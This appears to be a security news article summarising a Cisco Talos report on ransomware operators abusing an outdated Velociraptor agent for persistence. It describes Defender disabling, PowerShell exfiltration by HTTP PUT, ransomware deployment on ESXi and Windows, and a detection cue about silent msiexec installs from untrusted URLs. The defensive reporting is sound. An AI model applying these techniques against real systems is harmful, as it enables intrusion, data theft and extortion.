Cisco Talos has confirmed that ransomware operators are now leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool, to gain stealthy, persistent access and deploy multiple ransomware variants against enterprise environments.
This marks the first definitive linkage between Velociraptor and ransomware operations, underscoring a shift in how threat actors incorporate legitimate security software into their playbooks.
Velociraptor is designed to provide continuous endpoint monitoring across Windows, Linux, and macOS systems by deploying lightweight client agents.
In the observed campaign, adversaries installed an outdated version of Velociraptor (v0.73.4.0) on compromised hosts, exploiting a privilege escalation vulnerability (CVE-2025-6264) to execute arbitrary commands as SYSTEM.
This vulnerable version enabled the actors to maintain long-term, stealthy access even after hosts were isolated by cybersecurity teams.
By deploying Velociraptor without triggering alarms, the attackers executed reconnaissance commands, manipulated scheduled tasks, and disabled critical Microsoft Defender features to avoid detection.
Multifaceted Ransomware Deployment
Following initial access, the threat actors deployed a combination of Warlock, LockBit, and Babuk ransomware across VMware ESXi virtual machines and Windows servers.
Warlock ransomware, which emerged in June 2025 and has been closely associated with Storm-2603, appended the extension “.xlockxlock” to encrypted files.
Simultaneously, a Babuk binary targeted ESXi hosts, appending “.babyk” to partially encrypted files. The use of two distinct ransomware families in a single campaign is unusual and raises confidence that Storm-2603 orchestrated the attack.
To exfiltrate sensitive data for double-extortion, the attackers executed a PowerShell script that recursively gathered Office documents under 50 MB, then uploaded them via HTTP PUT requests to a remote server.
The script suppressed progress output by setting $ProgressPreference="SilentlyContinue" and employed randomized sleep intervals to thwart sandbox analysis and evade security alerts.
Talos attributes this campaign with moderate confidence to the China-based threat actor Storm-2603, first identified abusing SharePoint ToolShell vulnerabilities in July 2025.
Indicators include overlapping TTPs—such as use of cmd.exe batch scripts, scheduled tasks, IIS component manipulation for loading malicious .NET assemblies, and Group Policy Object modifications—and the deployment of both Warlock and LockBit ransomware.
Although Babuk had not been previously deployed by Storm-2603, its presence on ESXi systems suggests operational experimentation or tool sharing among ransomware groups.
Limited visibility into the initial intrusion prevented direct observation of ToolShell exploitation. However, the victim’s SharePoint servers were known to be unpatched against those vulnerabilities, making initial access via ToolShell a plausible vector.
Following domain compromise, the attackers created admin accounts synced to Entra ID and accessed the VMware vSphere console, enabling full control over virtual infrastructure.
Mitigations
To defend against similar campaigns, organizations should ensure that Velociraptor agents are updated to the latest secure versions and audited for unauthorized installations.
Patching CVE-2025-6264 and all known ToolShell vulnerabilities on on-premises SharePoint servers is critical.
Security teams should monitor for unexpected Velociraptor client activity, particularly installations initiated via msiexec /q /i commands pointing to untrusted URLs.
Implementing robust endpoint detection and response solutions that can distinguish legitimate from malicious Velociraptor activity is essential.
Regularly reviewing scheduled tasks, Group Policy changes, and PowerShell script executions for anomalous patterns will help identify early signs of compromise.
For further guidance, refer to Cisco Talos’ Ransomware Primer and ToolShell patching recommendations, as well as community resources on detecting Velociraptor misuse.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
